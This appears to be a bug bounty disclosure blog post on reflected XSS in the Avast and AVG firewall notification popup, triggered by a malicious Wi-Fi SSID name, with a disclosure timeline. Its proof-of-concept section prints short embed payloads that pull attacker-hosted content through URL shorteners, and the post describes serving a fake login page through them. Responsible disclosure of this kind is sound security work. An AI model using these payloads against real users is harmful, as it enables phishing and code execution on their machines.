CVE-2019–18653 & CVE-2019–18654: The story when Reflected XSS was triggering from SSID Name (It also affected AVG AntiVirus since basically the code of the those products was mostly “merged”).
In the name of Allah, the Most Gracious, the Most Merciful.
So, this article will be explained in two ways, which are the one that tell the story how I got it and the one that trying to explain the basic and the reference.
Readers could also read the TL;DR section directly.
1.1. Create an SSID Name with simple XSS Payload (with maximum = 32 characters). We can use BruteLogic and s0md3v short XSS payload (thanks man!).
1.2. Connecting your Windows OS (with installed and active Avast AntiVirus) to those SSID and wait for the Avast’s Network Notification Feature triggered the XSS Payload.
1.3. Reporting to Avast and confirmed as a valid issue within around 2 days. And few months later, they judged if the issue to be rather serious and decided to reward the report with $5000.
II. Behind the Scene about How I got this Issue
So, few years ago, I read one of the nice article from one of the bug hunter when he just got much of XSS issue at big names company by put the XSS payload at his SSID name (I really lost those bookmark because one thing). In short, when he surfing to much apps, he got so many app that reflecting the value of his SSID name (and the XSS was triggered). From there, then I start to use the XSS payload as my SSID name (on my OS X).
So, few months ago, I got a notebook (with windows inside) from the office that I working for. I installed anything that I need from tethering connection and leave the Avast AntiVirus for the last (at home). At home, I continue the installation and everything goes right.
Until someday I use this notebook again for training purpose. In the middle of training (day 3 or day 4), I having an issue with the used connection. So, suddenly this notebook connect to my tethering connection automatically (with Avast has been installed), and within few second, I got a popup alert with “https://local.avast.com” appears at my desktop.
To be honest, I have no idea how it could works like that. Lucky me, there is a recording video at the class and I asked for copying the talks between those period of time. Trying to figure how those one appears, finally I got the answer at the next day. Those XSS was triggered because because the embedded “Network Notification Feature” (Firewall) at Avast (specifically for Internet Security and Premiere Edition) was reflecting the SSID name and didn’t do the sanitation yet.
Then I create the report at those night, and got a reply around 2 days that confirmed if the issue was valid.
As quoted from Avast’s official site, Avast as one of the largest security companies in the world that using next-gen technologies to fight cyber-attacks in real time, is dedicated to creating a world that provides safety and privacy for all, no matter who you are, where you are, or how you connect.
With the much of research that conduct by Avast, Avast trying to reach the best endpoint protection for every user. One of their feature that could be seen is “Firewall” feature that could be used easily to manage the in and out traffic.
By default, this Firewall feature could give an alert (popup notification) to user when they connect to new network. For example, as the shown picture below, it shows that the user just connect into the wireless network with “My Hotspot” as SSID name.
After the popup showing up, then the user could choose the type of network from the SSID that they connected, such as “Private” network or “Public” network.
But then, the problem exists when the notification popup didn’t filter the special character that reflected from the SSID name yet. In other words, an Attacker could trigger the XSS at the client via the “notification popup” by using the malicious SSID name.
4.1. Cross Site Scripting (XSS) To put it simply, this kind of vulnerability is a vulnerability that could “let” an Attacker to be able to execute a code in the input section that hasn’t implemented filtering for special characters such as “ > < : / ; etc. In contrast to Stored XSS that “saves” the executed code, Reflected XSS actually doesn’t save this script at all, so the “target” is expected and required to visit the URL that has been “injected” by additional contents from an Attacker.
One of the good thing, even the SSID name has around 32 characters limitation, then we still could bypass it with calling the short URL. Credits to Brute Logic and S0md3v, Thanks man!
4.1.1. The Short XSS Payload At the first time I got a popup alert, I have no idea how to triggering it more. Then Alhamdulillah, so lucky that I remember if I ever read the publication that made by “Brute Logic” and “S0md3v” related the short XSS Payload. And cool thing is, it works!
And yes (absolutely), there are much researchers out there that still sharing another great and creative payload that you could follow.
4.2. Research Story related things that could be Executed by using the Malicious SSID Name As explained previously, I realized this trick from the write-up that has been released by one of the bug hunter (I’m really sorry, I really lost those bookmark because one thing). By those one, then I finally knew if the research about this area has been conduct very detail by Deral Heiland 2013 ago. He has published the research at BlackHat Europe 2013.
So, for the deep research and knowledge about this, you could refers his presentation. Very recommended.
4.3. Affected Version and Testing Environment Avast: The affected version of this vulnerability could be found at Avast Internet Security version 19.3.2369 (build 19.3.4241.440). It also affects the Avast Free Antivirus the premiere one.
And from the AVG side: the issue was affected the AVG Internet Securityversion 19.3.3084 (build 19.3.4241.440).
As a little note, both of issue has been reproduced at the Windows 10 environment (latest patch – per March 22nd, 2019).
V. SUMMARY OF ISSUE
As it has been described before, the security problem in this report is the vulnerability that could allow an Attacker to trigger the XSS at the client via the “notification popup” by using the malicious SSID name.
At this situation, an Attacker could also show the fake login page (for example with Avast / AVG logo) via the “notification popup” and user will not feel suspicious since there is no URL that could be seen / detected when the script triggering the fake login page.
VI. PROOF OF CONCEPT
For completing the explanation, there are few things that should be done to reproducing this issue. Here are the step by step that should be prepare:
6.2. Ensure if the victim to connect into those prepared SSID;
6.3. After victim connect into the prepared SSID, then just wait few seconds. The popup notification will be shown, and the script will be triggered:
6.4. Since the SSID name is limited into the 32 characters size, then we should tricks the script by using the short URL service. For example, we try to triggering the login form from other portal. The used script is: ><embed src=//tiny.cc/XYZABCX> (you also could use bit.ly).
And the good thing, you also could triggered the script from another external URL (credits to s0md3v). Here is an example: ><embed src=//14.rs>
VII. ADDITIONAL INFORMATION
For completing the explanation, here is the simple PoC video that could be seen about the works:
VIII. Reporting Timeline
Mar 21st, 2019: Found the issue and don’t know the root cause yet;
Mar 22nd, 2019: Found the problem, then create and send the report via firstname.lastname@example.org;
Mar 25th, 2019: Send the information if AVG is affected too;
Mar 25th, 2019: Avast replied and confirmed the bug. They said if they will release a fix soon;
Mar 25th, 2019: Avast replied if that not surprising (if AVG was affect with the same issue). They give a high level explanation nicely.
May 24th, 2019: Avast said if the issue was fixed (in Avast 19.4) and already release. They also said if they will give more details when the reward is decided.
June 12th, 2019: Avast judged this issue to be rather serious and decided to reward the report with $5000. (Really amazing).
This one is really break the record that I have in one reward payment. Also, the decision was really surprising me. At that time, I still didn’t believe it until those numbers really come into my Paypal account.
For Avast: Thank you so much for the surprising reward and the amazing program! Really appreciate. I have lost my words to thanking them.
Oct 30th, 2019:CVE-2019–18653 has been assigned for issue at Avast and CVE-2019–18654 has been assigned for issue at AVG.
IX. The Closing
Well, as the readers could see, this one is the thing that I never imagine (triggering the XSS at Desktop App). Few simple notes that maybe I could share (with my limited knowledge) are:
Always try to bookmark everything that you read. Put a note and comeback when you would like to use those tricks to your target. At this case, someday I read and save the publication that has been made by Brute Logic and s0md3v. When I meet the hard situation (for example to triggering the XSS with limited character), the I back to their write-up and open my note.
Even though looks silly, but would better if you put your SSID name with (for example) XSS Payload. I have put it for few years (since the first time I read the write-up that published by a bug hunter out there, thank man!), but I found it triggered at 2019 at the Desktop App in Windows OS (it doesn’t affect the OS X version of Avast anyway).
Also, another vector that I learned from this one are:
XSS via malicious SSID Name also could be triggered for the one that reflecting or storing our SSID name at the App. In this case, Avast and AVG has reflecting the SSID Name.
Apart from the desktop one, just please kindly don’t forget about the XSS that could also be triggered by Web or Mobile Application that reflecting the SSID Name.